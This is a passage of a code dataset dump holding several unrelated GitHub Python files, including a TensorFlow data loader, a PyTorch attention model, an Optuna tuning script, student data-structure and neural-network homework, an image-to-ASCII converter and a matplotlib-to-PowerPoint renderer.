x_val), axis=0)\n b = np.concatenate((y_train, y_val), axis=0)\n\n train_loader = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n validation_loader = tf.data.Dataset.from_tensor_slices((x_val, y_val))\n \n # print(validation_loader.shape)\n \n batch_size = 2\n # Augment the on the fly during training.\n train_dataset = (\n train_loader.shuffle(len(x_train))\n .map(train_preprocessing)\n .batch(batch_size)\n .prefetch(2)\n )\n\n print(train_dataset)\n\n # Only rescale.\n validation_dataset = (\n validation_loader.shuffle(len(x_val))\n .map(validation_preprocessing)\n .batch(batch_size)\n .prefetch(2)\n )\n print(\"데이터 완료\")\n\n # data = train_dataset.take(1)\n # images, labels = list(data)[0]\n # images = images.numpy()\n # image = images[0]\n # print(\"Dimension of the CT scan is:\", image.shape)\n \n return train_dataset, validation_dataset\n","repo_name":"ggaebi99/Medical_AI","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14710104486","text":"from __future__ import annotations\n\nfrom gi.repository import GtkSource\n\nfrom skytemple_ssb_debugger.context.abstract import AbstractDebuggerControlContext\n\n\nclass StringEventEmitter:\n \"\"\"Emits the string changed event to the context when a string was selected or changed.\"\"\"\n def __init__(self, view: GtkSource.View, context: AbstractDebuggerControlContext):\n self.view = view\n self.buffer: GtkSource.Buffer = view.get_buffer()\n self.buffer.connect('notify::cursor-position', self.on_buffer_notify_cursor_position)\n self.buffer.connect('changed', self.on_buffer_notify_cursor_position)\n self.context = context\n\n def on_buffer_notify_cursor_position(self, buffer: GtkSource.Buffer, *args):\n textiter = buffer.get_iter_at_offset(buffer.props.cursor_position)\n if 'string' in buffer.get_context_classes_at_iter(textiter):\n # iter_backward_to_context_class_toggle and iter_forward_to_context_class_toggle\n # seem to be broken (because of course they are), so we do it manually.\n start = self._get_string_start(textiter)\n end = self._get_string_end(textiter)\n if start is None or end is None:\n return True\n string = buffer.get_text(start, end, False)\n self.context.on_selected_string_changed(string)\n return True\n\n @staticmethod\n def _get_string_start(textiter):\n # First make sure we aren't at the start of the string...\n pit = textiter.copy()\n pit_char = pit.get_char()\n pit.forward_char()\n pit_next_char = pit.get_char()\n if pit_char in [\"'\", '\"'] and pit_next_char == pit_char:\n return\n it = textiter.copy()\n it.backward_char()\n prev = it.copy()\n prev.backward_char()\n while it.get_char() not in [\"'\", '\"'] or prev.get_char() == '\\\\':\n if not it.backward_char():\n return\n prev = it.copy()\n prev.backward_char()\n it.forward_char()\n return it\n\n @staticmethod\n def _get_string_end(textiter):\n it = textiter.copy()\n prev_char = it.get_char()\n while it.get_char() not in [\"'\", '\"'] or prev_char == '\\\\':\n prev_char = it.get_char()\n if not it.forward_char():\n return\n return it\n","repo_name":"SkyTemple/skytemple-ssb-debugger","sub_path":"skytemple_ssb_debugger/model/completion/calltips/string_event_emitter.py","file_name":"string_event_emitter.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"4391049217","text":"import optuna\nimport model_pipeline\nfrom model_pipeline import FARMTrainer, ModelConfig, FileConfig, TokenizerConfig, MLFlowConfig, ProcessorConfig, TrainingConfig\n\ndef objective(trial):\n # Uniform parameter\n dropout_rate = trial.suggest_uniform('dropout_rate', 0.0, 1.0)\n\n num_epochs = trial.suggest_int('num_epochs', 1, 5, 1)\n batch_size = trial.suggest_int('batch_size', 4, 32, 4)\n\n # Loguniform parameter\n learning_rate = trial.suggest_loguniform('learning_rate', 1e-5, 1e-2)\n\n file_config = FileConfig()\n train_config = TrainingConfig()\n\n train_config.learning_rate = learning_rate\n train_config.n_epochs = num_epochs\n train_config.dropout = dropout_rate\n train_config.batch_size = batch_size\n train_config.run_hyp_tuning = True\n\n model_config = ModelConfig()\n mlflow_config = MLFlowConfig()\n processor_config = ProcessorConfig()\n tokenizer_config = TokenizerConfig()\n\n farm_trainer = FARMTrainer(\n file_config =file_config,\n tokenizer_config=tokenizer_config,\n model_config=model_config,\n processor_config=processor_config,\n training_config=train_config,\n mlflow_config=mlflow_config\n )\n acc = farm_trainer.run(trial)\n\n return acc\n\nif __name__ == \"__main__\":\n study = optuna.create_study(direction=\"maximize\", pruner=optuna.pruners.MedianPruner())\n study.optimize(objective, n_trials=100)\n\n pruned_trials = [t for t in study.trials if t.state == optuna.structs.TrialState.PRUNED]\n complete_trials = [t for t in study.trials if t.state == optuna.structs.TrialState.COMPLETE]\n\n print(\"Study statistics: \")\n print(\" Number of finished trials: \", len(study.trials))\n print(\" Number of pruned trials: \", len(pruned_trials))\n print(\" Number of complete trials: \", len(complete_trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: \", trial.value)\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n","repo_name":"os-climate/corporate_data_extraction","sub_path":"data_extractor/code/model_pipeline/model_pipeline/optuna_hyp.py","file_name":"optuna_hyp.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74305257068","text":"# CSE220 LAB_05\n# 21141064\n# Basit Hussain\n# Sec: 13\n\n\n\nclass ArrayStack:\n def __init__(self, sz):\n self.bracketsTracker_stack = [None] * sz\n self.indexTracker_stack = [None] * sz\n self.size1 = 0\n self.size2 = 0\n def push(self, e):\n if self.size1 == len(self.bracketsTracker_stack):\n print(\"No space in array\")\n else:\n if str(e) in \"({[\":\n self.bracketsTracker_stack[self.size1] = e\n self.size1 += 1\n else:\n self.indexTracker_stack[self.size2] = e\n self.size2 += 1\n def pop(self):\n if self.size1 == 0:\n return (\"Array is empty\")\n else:\n temp1 = self.bracketsTracker_stack[self.size1-1]\n self.bracketsTracker_stack[self.size1-1] = 0\n temp2 = self.indexTracker_stack[self.size2-1]\n self.indexTracker_stack[self.size2-1] = 0\n self.size1 -= 1\n self.size2 -= 1\n return temp1, temp2\n def peek(self):\n if self.size1 == 0:\n return (\"Array is empty\")\n else:\n temp = self.bracketsTracker_stack[self.size-1]\n return temp\n def is_empty(self):\n return self.size1 == 0\n \n def balancing(self, string):\n check = True\n for i in range(len(string)):\n if string[i] in \"({[\":\n self.push(string[i])\n self.push(i)\n else:\n if string[i] in \")}]\":\n if self.is_empty() == True:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(i+1) + \". \" + str(string[i]) + \"- not opened.\"\n output = \"{} {}\". format(check, error)\n return output\n top = self.pop()\n if top == \"(\":\n if string[i] != \")\":\n check = False\n if top == \"{\":\n if string[i] != \"}\":\n check = False\n if top == \"[\":\n if string[i] != \"]\":\n check = False\n if self.is_empty() == True and check == True:\n return \"This expression is correct.\"\n else:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(top[0]) + \". \" + str(top[1]+1) + \"- not closed.\" \n output = \"{} {}\". format(check, error)\n return output\n \n \n \nprint(\"==========Test 1==========\")\nstring = \"1+2*(3/4)\"\ns1 = ArrayStack(len(string))\nprint(s1.balancing(string))\n\n\n\n\nclass Node:\n def __init__(self, e):\n self.e = e\n self.next = None\n\nclass LinklistStack:\n def __init__(self):\n self.head1 = None\n self.size1 = 0\n self.head2 = None\n self.size2 = 0\n def push(self, val):\n if self.head1 == None:\n if str(val) in \"({[\":\n self.head1 = Node(val)\n self.size1 += 1\n else:\n self.head2 = Node(val)\n self.size2 += 1 \n else:\n if str(val) in \"({[\":\n n1 = Node(val)\n n1.next = self.head1\n self.head1 = n1\n self.size1 += 1\n else:\n n2 = Node(val)\n n2.next = self.head2\n self.head2 = n2\n self.size2 += 1\n def pop(self):\n if self.head1 == None:\n return (\"LinkList is empty\")\n else:\n h1 = self.head1\n t1 = h1.e\n self.head1 = h1.next\n h1 = None\n self.size1 -= 1\n \n h2 = self.head2\n t2 = h2.e\n self.head2 = h2.next\n h2 = None\n self.size2 -= 1\n return t1, t2\n def peek(self):\n if self.head1 == None:\n return (\"LinkList is empty\")\n else:\n return self.head1.e\n def is_empty(self):\n return self.size1 == 0\n \n def balancing(self, string):\n check = True\n for i in range(len(string)):\n if string[i] in \"({[\":\n self.push(string[i])\n self.push(i)\n else:\n if string[i] in \")}]\":\n if self.is_empty() == True:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(i+1) + \". \" + str(string[i]) + \"- not opened.\"\n output = \"{} {}\". format(check, error)\n return output\n top = self.pop()\n if top == \"(\":\n if string[i] != \")\":\n check = False\n if top == \"{\":\n if string[i] != \"}\":\n check = False\n if top == \"[\":\n if string[i] != \"]\":\n check = False\n if self.is_empty() == True and check == True:\n return \"This expression is correct.\"\n else:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(top[1]+1) + \". \" + str(top[0]) + \"- not closed.\" \n output = \"{} {}\". format(check, error)\n return output\n \nprint(\"==========Test 1==========\") \nl = LinklistStack()\nstring = \"1+2*[3*3+{4–5(6(7/8/9)+10)}–11+(12*8)/{13+13}]+14\"\nprint(l.balancing(string))\n","repo_name":"BasitHussain5/BRACU_All_CSE","sub_path":"CSE220/LAB/LAB05/Lab05_21141064.py","file_name":"Lab05_21141064.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29179167940","text":"import torch\nfrom torch.nn.functional import relu\nimport torch.nn as nn\n\n\nclass Attention(nn.Module):\n\n def __init__(self, seq_len, embed_dim, n_heads, hidden_dim, n_classes, p_drop=0):\n super(Attention, self).__init__()\n self.att = nn.MultiheadAttention(embed_dim, n_heads, p_drop)\n self.fc1 = nn.Linear(seq_len * embed_dim, hidden_dim)\n self.fc2 = nn.Linear(hidden_dim, n_classes)\n self.drop1 = nn.Dropout(p_drop)\n self.drop2 = nn.Dropout(p_drop)\n self.norm1 = nn.LayerNorm(embed_dim)\n self.norm2 = nn.LayerNorm(hidden_dim)\n\n def forward(self, x):\n # shape (L, N, embed_dim) for attention layer\n x = x.permute(2, 0, 1)\n ao, _ = self.att(x, x, x)\n ao = self.drop1(ao)\n x = self.norm1(ao + x)\n # shape (N, -1) for fc layers\n x = x.permute(1, 0, 2)\n x = x.reshape(x.shape[0], -1)\n x = self.fc1(x)\n x = relu(self.norm2(x))\n x = self.fc2(x)\n return x","repo_name":"lucasmllr/classify_language","sub_path":"src/models/att.py","file_name":"att.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6160138642","text":"import numpy as np\nfrom collections import defaultdict\nimport csv\n\ndef main():\n\n\tfor dir in ['fr-en', 'en', 'en-fr', 'fr']:\n\n\t\tdatafile = np.load('{}_sentiment.npy'.format(dir), allow_pickle=True).flat[0]\n\t\tdatalist = datafile.keys()\n\n\t\twith open('./subs/new_moviesents_{}.csv'.format(dir), 'w+') as f:\n\t\t\twriter = csv.writer(f, delimiter='|')\n\t\t\tfor value in datalist:\n\t\t\t\twriter.writerow([str(value), ',', datafile[value]])\n\t\tf.close()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"vdorbala/Movie-Subtitle-Quality","sub_path":"npy2csv.py","file_name":"npy2csv.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"514097477","text":"#################################################################################\n# #\n# Code for Question 2(b) #\n# #\n#################################################################################\n\nimport numpy as np\n\n\ndef sigmoid(Z):\n \"\"\"\n sigmoid(ndarray) -> ndarray\n \n Applies sigmoid to each entry of the matrix Z\n \n Z: (num_rows, num_cols) input matrix\n \n Returns: Z_hat\n Z_hat: (num_rows, num_cols) Matrix obtained by applying sigmoid to\n each entry of Z \n \"\"\"\n # Initialize the output\n Z_hat = np.zeros(Z.shape)\n \n ########################### YOUR CODE HERE ################################\n \n # Copy your implementation from Ans 2(a) here\n \n # raise NotImplementedError\n Z_hat = 1/(1+np.exp(-Z))\n ###########################################################################\n \n return Z_hat\n \n \n \ndef sigmoid_grad(Z):\n \"\"\"\n sigmoid_grad(ndarray) -> ndarray\n \n Let Z = sigmoid(X), be matrix obtained by applying sigmoid to another\n matrix X. This function computes sigmoid'(X).\n \n Z: (num_rows, num_cols) Sigmoid output\n \n Returns:\n Z_grad: (num_rows, num_cols) Computed gradient\n \"\"\"\n # Initialize the output\n Z_grad = np.zeros(Z.shape)\n \n ########################### YOUR CODE HERE ################################\n \n # Copy your implementation from Ans 2(a) here\n \n # raise NotImplementedError\n Z_grad = sigmoid(Z)*(1-sigmoid(Z))\n ###########################################################################\n \n return Z_grad \n \n\n\nclass Linear:\n \"\"\"\n Class that implements a single linear layer\n \"\"\"\n \n def __init__(self, num_inputs, num_outputs, act=sigmoid, \\\n act_grad=sigmoid_grad):\n \"\"\"\n __init__(self, int, int, function, function) -> None\n \n num_inputs: Number of features in the input (excluding bias)\n num_outputs: Number of output neurons (excluding bias)\n act: Activation function to use\n act_grad: Function that computes gradient of the activation function\n \"\"\" \n # Initialze variables that will be used later\n self.num_inputs = num_inputs\n self.num_outputs = num_outputs\n self.act = act\n self.act_grad = act_grad\n \n ########################### YOUR CODE HERE #############################\n \n # Copy your implementation from Ans 2(a) here \n\n # raise NotImplementedError\n self.W = np.random.rand(self.num_inputs,self.num_outputs)\n self.b = np.random.rand(1,self.num_outputs)\n ########################################################################\n \n \n def forward(self, X):\n \"\"\"\n forward(Linear, ndarray) -> ndarray\n \n Computes the forward pass on this layer\n \n X: (num_examples, num_inputs) Input matrix for this layer. Each row\n corresponds to an example\n \n Returns: out\n out: (num_examples, num_outputs) Computed output activations\n \"\"\"\n # Some useful variables\n num_examples = X.shape[0]\n \n # Initialze self.out, self is needed beacuse it is used by backward\n self.out = np.zeros((num_examples, self.num_outputs))\n self.input = X # Will be used during backpropagation\n \n ########################### YOUR CODE HERE #############################\n \n # Copy your implementation from ans2a here\n \n # Compute the pre-activation outputs pre_acts \n pre_acts = np.add(np.matmul(self.input,self.W),self.b)\n \n # Apply activations to pre_acts using self.act(pre_acts) \n self.out = self.act(pre_acts)\n # raise NotImplementedError\n ########################################################################\n \n return self.out\n\n\n def backward(self, delta_out):\n \"\"\"\n backward(Linear, ndarray) -> ndarray\n Computes the gradient of the weights associated with this layer.\n Returns the error associated with input.\n\n delta_out: (num_examples, num_output) Error associated with the output units\n\n Returns: delta_in\n delta_in: (num_examples, num_inputs) Errors associated with the input\n units\n \"\"\"\n # Some useful variables\n num_examples = delta_out.shape[0]\n \n # Initialize the variables\n self.W_grad = np.zeros(self.W.shape)\n self.b_grad = np.zeros(self.b.shape)\n # print(self.b.shape)\n delta_in = np.zeros((num_examples, self.num_inputs))\n\n ########################### YOUR CODE HERE #############################\n \n # Compute self.W_grad, self.b_grad and delta_in\n\n # raise NotImplementedError\n Z = self.input\n delta_in = np.matmul(delta_out, self.W.T)*sigmoid_grad(Z)\n self.W_grad = np.matmul(self.input.T, delta_out)/num_examples\n self.b_grad = np.sum(delta_out,axis = 0)/num_examples\n # self.b_grad = delta_out\n self.b_grad = np.expand_dims(self.b_grad, axis=0)\n \n ########################################################################\n \n return delta_in\n\n\n def step(self, learning_rate=1e-2):\n \"\"\"\n step(Linear, float) -> None\n\n Updates the weights of this layer using gradients computed by the\n backward funciton by applying a single step of gradient descent\n\n learning_rate: The learning rate used for gradient descent\n \"\"\"\n ########################### YOUR CODE HERE #############################\n \n # Update self.W and self.b based on self.W_grad and self.b_grad\n self.W = self.W - learning_rate*self.W_grad\n self.b = self.b - learning_rate*self.b_grad\n \n # raise NotImplementedError\n \n ########################################################################\n \n\n","repo_name":"sruthigorantla/MachineLearning_A2","sub_path":"Q2/ans2b.py","file_name":"ans2b.py","file_ext":"py","file_size_in_byte":6436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12414905120","text":"\"\"\"Renderer\n\nReference\n---------\n* https://matplotlib.org/3.1.1/api/backend_bases_api.html\n\"\"\"\n\nfrom matplotlib.backend_bases import RendererBase\nimport matplotlib.path as mpath\nimport numpy as np\nfrom PIL import Image\n\nimport warnings\n\nfrom figpptx import constants\nfrom figpptx import pptx_misc\n\n\ndef to_color_infos(rgb):\n if len(rgb) == 4:\n alpha = rgb[3]\n rgb = rgb[:3]\n elif len(rgb) == 3:\n alpha = 1\n assert len(rgb) == 3\n rgb = tuple(map(lambda x: int(round(x * 255)), rgb))\n rgb_int = sum(rgb[index] << (8 * index) for index in range(3))\n return rgb_int, alpha\n\n\nclass CrudeRenderer(RendererBase):\n \"\"\"Last resolution for rendering of Artist.\n\n Args:\n slide_editor\n slide: Slide object.\n size: 2-length (width, height)\n\n \"\"\"\n\n def __init__(self, slide_editor):\n super().__init__()\n self.slide_editor = slide_editor\n self.slide = self.slide_editor.slide\n self._made_shapes = list()\n\n @property\n def made_shapes(self):\n \"\"\"Return the generated shapes.\"\"\"\n return self._made_shapes\n\n @property\n def height(self):\n return self.slide_editor.height\n\n @property\n def width(self):\n return self.slide_editor.width\n\n def draw_path(self, gc, path, transform, rgbFace=None):\n slide = self.slide\n msoEditingAuto = constants.msoEditingAuto\n msoSegmentLine = constants.msoSegmentLine\n msoSegmentCurve = constants.msoSegmentCurve\n msoEditingCorner = constants.msoEditingCorner\n form = None\n sx, sy = None, None\n array = None\n shapes = list()\n arrays = list()\n\n for index, (vertex, code) in enumerate(path.iter_segments(transform=transform)):\n # print(\"code\", code, \"vertex\", vertex)\n vertex = self.slide_editor.transform(vertex)\n if (not form) and code == mpath.Path.MOVETO:\n x, y = vertex\n form = slide.Shapes.BuildFreeform(msoEditingAuto, x, y)\n array = [(x, y)]\n sx, sy = x, y\n elif form and code == mpath.Path.MOVETO:\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n\n x, y = vertex\n form = slide.Shapes.BuildFreeform(msoEditingAuto, x, y)\n array = [(x, y)]\n sx, sy = x, y\n\n elif code == mpath.Path.CLOSEPOLY:\n \"\"\"You must not use vertex when code is 79.\"\"\"\n x, y = vertex\n form.AddNodes(msoSegmentLine, msoEditingAuto, sx, sy)\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n form, sx, sy = None, None, None\n elif code == mpath.Path.STOP:\n assert False, \"Not expected.\"\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n form, sx, sy = None, None, None\n elif code == mpath.Path.LINETO:\n assert len(vertex) == 2\n x, y = vertex\n form.AddNodes(msoSegmentLine, msoEditingAuto, x, y)\n array.append((x, y))\n elif code == mpath.Path.CURVE3:\n x, y, x1, y1 = vertex\n form.AddNodes(msoSegmentCurve, msoEditingCorner, x, y, x1, y1)\n array.append((x, y))\n elif code == mpath.Path.CURVE4:\n x, y, x1, y1, x2, y2 = vertex\n form.AddNodes(msoSegmentCurve, msoEditingCorner, x, y, x1, y1, x2, y2)\n array.append((x, y))\n else:\n raise ValueError(\"...\", \"code\", code)\n if form is not None:\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n form, sx, sy = None, None, None\n array = None\n\n assert len(shapes) == len(arrays)\n for shape, array in zip(shapes, arrays):\n if rgbFace is None or len(array) <= 2:\n shape.Fill.Visible = False\n else:\n int_rgb, alpha = to_color_infos(rgbFace)\n shape.Fill.ForeColor.RGB = int_rgb\n shape.Fill.Transparency = 1 - alpha\n shape.Fill.Visible = constants.msoTrue\n\n line_weight = gc.get_linewidth()\n shape.Line.Weight = line_weight\n if not line_weight:\n shape.Line.Visible = constants.msoFalse\n else:\n shape.Line.Visible = constants.msoTrue\n int_rgb, alpha = to_color_infos(gc.get_rgb())\n shape.Line.ForeColor.RGB = int_rgb\n shape.Line.Transparency = 1 - alpha\n\n\n # make a Group.\n if 1 < len(shapes):\n for index, shape in enumerate(shapes):\n if index == 0:\n shape.Select(True)\n shape.Select(False)\n shape = self.slide.Application.ActiveWindow.Selection.ShapeRange.Group()\n\n self._made_shapes.append(shape)\n\n def draw_image(self, gc, x, y, im, transform=None):\n image = Image.fromarray(im[::-1, ...])\n slide = self.slide_editor.slide\n width, height = self.slide_editor.size\n x, y = self.slide_editor.transform([x, y])\n x, y = x, y - image.height\n shape = pptx_misc.paste_image(slide, image, left=x, top=y)\n self._made_shapes.append(shape)\n\n def draw_gouraud_triangle(self, gc, points, colors, transform):\n \"\"\"\n Tries to draw Gourand Triangle, however cannot...\n\n Note\n ----\n (2020-01-23) I feel it is impossible to\n gourand - triangles.\n Hence, instread of using gradation,\n the average color is used as a substitute.\n \"\"\"\n\n warnings.warn(\n \"Draw of ``Gourand Triangle`` does not work correctly.\", UserWarning\n )\n\n def _make_triangle(slide, points):\n sx, sy = points[0]\n form = slide.Shapes.BuildFreeform(constants.msoEditingAuto, sx, sy)\n x, y = points[1]\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, x, y)\n x, y = points[2]\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, x, y)\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, sx, sy)\n shape = form.ConvertToShape()\n return shape\n\n points = transform.transform(points)\n points = np.array(self.slide_editor.transform(points))\n color = np.mean(colors, axis=0)\n int_rgb, alpha = to_color_infos(color)\n\n slide = self.slide_editor.slide\n shape = _make_triangle(slide, points)\n shape.Fill.ForeColor.RGB = int_rgb\n shape.Fill.Transparency = 1 - alpha\n shape.Fill.Visible = constants.msoTrue\n shape.Line.Visible = constants.msoFalse\n\n self._made_shapes.append(shape)\n\n def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None):\n # I do not understand why ``y`` is minus...\n y = -y + prop.get_size()\n x, y = self.slide_editor.transform((x, y))\n # msoTrue = -1\n msoFalse = 0\n ppAutoSizeShapeToFitText = 1\n msoTextOrientationHorizontal = 1\n arg_dict = {\n \"Left\": x,\n \"Top\": y,\n \"Width\": 100,\n \"Height\": 100,\n \"Orientation\": msoTextOrientationHorizontal,\n }\n shape = self.slide.Shapes.AddTextbox(**arg_dict)\n shape.TextFrame.TextRange.Text = s\n shape.TextFrame.AutoSize = ppAutoSizeShapeToFitText\n shape.TextFrame.TextRange.Font.Size = prop.get_size()\n shape.TextFrame.MarginLeft = 0\n shape.TextFrame.MarginRight = 0\n shape.TextFrame.MarginTop = 0\n shape.TextFrame.MarginBottom = 0\n shape.TextFrame.WordWrap = msoFalse\n\n # Itatic\n style = prop.get_style()\n if style in {\"italic\", \"oblique\"}:\n shape.TextFrame.Textrange.Font.Italic = True\n\n # Color\n rgb = gc.get_rgb()\n # Is there a place to set ``alpha``?\n rgb_int, alpha = to_color_infos(rgb)\n shape.TextFrame.TextRange.Font.Color.RGB = rgb_int\n shape.Fill.Visible = False\n\n # Rotation.\n pivot = (shape.Left, shape.Top + shape.Height)\n _rotate_offset(shape, angle, pivot)\n\n self._made_shapes.append(shape)\n\n\ndef _rotate_offset(shape, angle, pivot):\n \"\"\"\n Rotate ``shape`` `angle` degrees\n clockwise along ``pivot.\n\n Args:\n angle:\n degree.\n pivot:\n (`x`, `y`), pivot of the rotation.\n \"\"\"\n if angle == 0:\n return\n cx = shape.Left + shape.Width / 2\n cy = shape.Top + shape.Height / 2\n\n theta = -angle / 180 * np.pi # Sign of angle.\n\n # Rotation matrix.\n rotmat = np.array(\n [[np.cos(theta), -np.sin(theta)], [+np.sin(theta), np.cos(theta)]]\n )\n px, py = pivot\n # Pivot's position after Rotation.\n tx, ty = rotmat @ np.array([px - cx, py - cy]) + np.array([cx, cy])\n # Pivot is equal in before and after.\n shape.Left += px - tx\n shape.Top += py - ty\n shape.Rotation = -angle # Sign of angle.\n\n \"\"\" # A candidate of code.\n However, it is a little diffuclt.\n rotmat = np.array([[1 - np.cos(theta), + np.sin(theta) ],\n [- np.sin(theta), 1 - np.cos(theta)]])\n px, py = pivot\n tx, ty = rotmat @ np.array([px - cx, py - cy])\n shape.Left += tx\n shape.Top += ty\n shape.Rotation = - angle # Definition of Rotation.\n \"\"\"\n\n\nclass DummyRenderer(RendererBase):\n \"\"\"Dummy Renderer.\n This class is used for calling of the ``Figure/Axes`` draw\n so that adjustement functions are called according to settings.\n\n Ref:\n * https://matplotlib.org/3.1.1/api/backend_bases_api.html?highlight=renderer%20draw_path_collection#matplotlib.backend_bases.RendererBase # NOQA\n \"\"\"\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n super().__init__()\n\n def draw_path(self, gc, path, transform, rgbFace=None):\n pass\n\n def draw_image(self, gc, x, y, im, transform=None):\n pass\n\n def draw_gouraud_triangle(self, gc, points, colors, transform):\n pass\n\n def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None):\n pass\n\n def draw_markers(self, gc, marker_path, marker_trans, path, trans, rgbFace=None):\n pass\n\n def draw_path_collection(\n self,\n gc,\n master_transform,\n paths,\n all_transforms,\n offsets,\n offsetTrans,\n facecolors,\n edgecolors,\n linewidths,\n linestyles,\n antialiaseds,\n urls,\n offset_position,\n ):\n pass\n\n def draw_quad_mesh(\n self,\n gc,\n master_transform,\n meshWidth,\n meshHeight,\n coordinates,\n offsets,\n offsetTrans,\n facecolors,\n antialiased,\n edgecolors,\n ):\n pass\n","repo_name":"Sillte/figpptx","sub_path":"figpptx/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26574341510","text":"import main\nfrom person import Person\nimport inquirer\nfrom time import sleep\nlist = []\nlist_options = ['Add a new person','Show database', 'Edit database', 'Quit']\n\nwhile True:\n main.inishow()\n questions = [\n inquirer.List('opt',\n message='What do you want me to do?',\n choices=list_options,\n ),\n ]\n answ = inquirer.prompt(questions)\n sel = answ['opt']\n if sel == list_options[0]:\n main.add(list)\n elif sel == list_options[1]:\n if list == []:\n main.datashow()\n print(\"\\033[1;31mERROR! There's no database to be shown\\033[m\")\n print('\\033[1;31mGoing back to the MENU!\\033[m')\n else: \n main.datashow()\n main.show(list)\n elif sel == list_options[2]:\n if list == []:\n main.editshow()\n print(\"\\033[1;31mERROR! There's no database to be edited\\033[m\")\n print('\\033[1;31mGoing back to the MENU!\\033[m')\n else:\n main.editshow()\n main.edit(list)\n \n elif sel == list_options[3]:\n main.quitshow()\n print('\\033[1;31mQUITTING...\\033[m')\n break \n sleep(1) \n\n\n\n\n\n","repo_name":"gabrielkunst/python","sub_path":"proj/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36045478954","text":"import datetime\n\n\ndef datetime_input(date_time):\n year = str(date_time.year)\n month = (date_time.month)\n day = (date_time.day)\n century(year, month, day)\n\n\ndef century(year, month, day):\n\n # year = input('date année?')\n # month = input('date mois?')\n # day = input('date jours?')\n # date = datetime.date(int(year), int(month), int(day))\n # print(date)\n # if not date:\n # print(\"Bye\")\n\n # else:\n if int(year) < 101:\n if int(year) < 1:\n return '0'\n else:\n return 'Premier'\n if len(year) < 4:\n unite_siecle = year[:1]\n test_siecle = int(unite_siecle)*100\n print('test_siecle ', test_siecle)\n if int(test_siecle) == int(year):\n return {unite_siecle}\n else:\n siecle = int(unite_siecle)\n siecle += 1\n return {siecle}\n if len(year) < 5:\n unite_siecle = year[:2]\n test_siecle = int(unite_siecle)*100\n print('test_siecle ', test_siecle)\n\n if int(test_siecle) == int(year):\n return {unite_siecle}\n else:\n siecle = int(unite_siecle)\n siecle += 1\n return {siecle}\n return 'pas de date ?'\n\n\ndef validate_year(date):\n ''' fonction validation de l'année '''\n y = date.year\n\n\n# if __name__ == '__main__':\n# datetime_input(datetime.date(1953, 5, 1))\n# cent = century()\n# print(cent, ' siècle')\n","repo_name":"thycan22/babel-thycan22","sub_path":"catalog/century.py","file_name":"century.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38650448122","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\n\nCHAR_PIX_LIST = ['M', '&', 'D', 'n', '1', '+', ',', ' ']\nGAP = 256 / len(CHAR_PIX_LIST)\n\n\nclass Img2txt:\n def __init__(self, src, resize=0.7):\n self.src = src\n img = Image.open(src)\n if img.mode == 'P' or img.mode == 'RGBA':\n im = Image.new('RGB', img.size, 'white')\n im.paste(img.convert('RGBA'), img.convert('RGBA'))\n img = im\n img = img.convert('L')\n self.w = int(img.size[0] * resize)\n self.h = int(img.size[1] / 2.0 * resize) # 由于显示的字符不是等高宽的(高比宽长),这里将图片高度缩小来调整。\n img = img.resize((self.w, self.h), Image.ANTIALIAS)\n self.pixes = img.load()\n\n def img2txt(self):\n with file(self.src + '.txt', 'w') as txt:\n for y in range(self.h):\n def get_char_pix():\n for x in range(self.w):\n pix = self.pixes[x, y]\n for index, c in enumerate(CHAR_PIX_LIST, 1):\n if pix < index * GAP:\n yield c\n break\n\n line = ''.join(get_char_pix())\n txt.write(line + '\\n')\n\n\n\nif '__main__' == __name__:\n img2txt = Img2txt('img.jpg')\n img2txt.img2txt()\n","repo_name":"EndlessCheng/my-python-scripts","sub_path":"img2txt.py","file_name":"img2txt.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11767486681","text":"import mysql.connector\nfrom mysql.connector import errorcode\n\n\nclass MySQLdb(object):\n db_root_user = 'root'\n db_root_pass = '****'\n db_host = 'localhost'\n cnx = mysql.connector.connect(host=db_host, 